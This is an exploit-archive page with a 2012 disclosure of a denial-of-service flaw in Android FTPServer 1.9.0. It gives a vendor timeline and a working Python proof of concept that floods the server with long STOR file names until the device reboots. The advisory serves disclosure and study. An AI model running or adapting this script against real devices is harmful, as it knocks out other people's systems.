what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Android FTPServer 1.9.0 Denial Of Service

Android FTPServer 1.9.0 Denial Of Service
Posted Mar 20, 2012
Authored by G13

Android FTPServer version 1.9.0 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 99b5263cdc7ac818b9abb4a71cfa2959797c47d75eb9f28f2708337a4473d0f9

Android FTPServer 1.9.0 Denial Of Service

Change Mirror Download
# Exploit Title: Android FTPServer 1.9.0 Remote DoS
# Date: 03/20/12
# Author: G13
# Twitter: @g13net
# Software Site: https://sites.google.com/site/andreasliebigapps/ftpserver/
# Download Link: http://www.g13net.com/ftpserver.apk
# Version: 1.9.0
# Category: DoS (android)
#

##### Vulnerability #####

FTPServer is vulnerable to a DoS condition when long file names are
repeatedly attempted to be written via the STOR command.

Successful exploitation will causes devices to restart.

Android Security Team has confirmed this issue.

I have been able to test this exploit against Android 2.2 and 2.3.
4.0 (ICS) appears not to be vulnerable.

##### Vendor Timeline #####

Android Security Team:
10/20/11 - Vendor Notified of vulnerability, Vendor notifies me they will
be looking into the issue
10/21/11 - vendor Requests bug report from device, bug report sent, PoC
Code Delivered to Vendor
10/24/11 - Asked Vendor Status, stated I have been able to duplicate issue
on multiple devices
10/25/11 - Vendor states they are still working on it
10/30/11 - Current Status asked
10/31/11 - vendor Replies no updates
11/7/11 - Emailed Vendor, they ask for more clarification on issue. I
submit more details
11/8/11 - Vendor acknowledges that it is not the APK itself causing the
crashes. Vendor also confirms full reboots from PoC code.
11/9/11 - Vendor asks if I am just crashing application or device in
certain instances. I state device is restarting.
11/11/11 - I ask if there is anything more I may assist with. Vendor
states they have isolated the impacted component and are working on a
fix.
11/18/11 - Current status Asked.
12/8/11 - Update requested, response that they will contact Kernel team for
an update
01/13/12 - Current status asked, no response
03/06/12 - Current status asked, no response
03/20/12 - Disclosure

Developer:
1/24/12 - Developer contacted
1/25/12 - Developer Responds
1/27/12 - Supplied Developer with PoC code, Developer confirms issue
1/29/12 - Developer releases new version
3/20/12 - Disclosure

##### PoC #####

#!/usr/bin/python
# Android FTPServer PoC Device Crash

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = "STOR " + "A" * 5000 + "\r\n"
for x in xrange(1,31):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print x
s.connect(('172.16.30.108',2121))

data=s.recv(1024)
s.send("USER test\r\n")
data=s.recv(1024)
s.send("PASS test\r\n")

s.send(buffer)

s.send("QUIT")

s.close()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close